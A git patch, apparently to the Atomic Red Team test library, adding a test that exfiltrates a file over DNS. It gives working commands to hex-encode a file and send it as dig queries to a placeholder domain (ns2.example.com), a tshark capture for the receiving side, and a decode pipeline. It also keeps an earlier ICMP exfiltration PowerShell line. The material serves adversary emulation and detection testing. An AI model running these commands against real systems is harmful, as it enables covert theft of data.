From 5b61194689a8dc6de6e244ef19e0f895f43f910e Mon Sep 17 00:00:00 2001 From: Sharath Unni Date: Tue, 10 Mar 2020 19:08:02 -0400 Subject: [PATCH] T1048 exfiltration over dns (#831) * added-dns-exfiltration Exfiltration over DNS * Update T1048.md Co-authored-by: Carrie Roberts --- atomics/T1048/T1048.md | 38 ++++++++++++++++++++++++++++++++++++++ atomics/T1048/T1048.yaml | 37 +++++++++++++++++++++++++++++++++++++ 2 files changed, 75 insertions(+) diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 29d71766..3d4ceabb 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -23,6 +23,7 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016) - [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp) +- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
@@ -137,4 +138,41 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont +
+ +## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS +Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings: + +a) Create an A record ns1.example.com that points to the server IP. + +b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com). + +**Supported Platforms:** Linux + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | target DNS domain | url | ns2.example.com| +| input_file | Path to file to be exfiltrated. | Path | ./example.txt| +| output_file | Filename of the data exfiltrated | string | received_data.txt| + + +#### Adversary machine: Run with `sh`! + +1. On the adversary machine run the below command. + +tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt + +#### Attack Commands: Run with `sh`! + +2. On the victim machine run the below commands. + +xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done + +#### Recover data by running the below commands. Run with `sh`! + +3. Once the data is received, use the below command to recover the data. + +cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r +
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index e014d2cd..1d512242 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -110,3 +110,40 @@ atomic_tests: elevation_required: false command: | $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } + + +- name: Exfiltration Over Alternative Protocol - DNS + description: | + Exfiltration of specified file over DNS protocol. + + supported_platforms: + - linux + + input_arguments: + domain: + description: target DNS domain + type: url + default: ns2.example.com + input_file: + description: Path to file to be exfiltrated. + type: Path + default: ./example.txt + output_file: + description: Filename of the data exfiltrated. + type: String + default: received_data.txt + + executor: + name: manual + steps: | + 1. On the adversary machine run the below command. + + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt + + 2. On the victim machine run the below commands. + + xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done + + 3. Once the data is received, use the below command to recover the data. + + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r \ No newline at end of file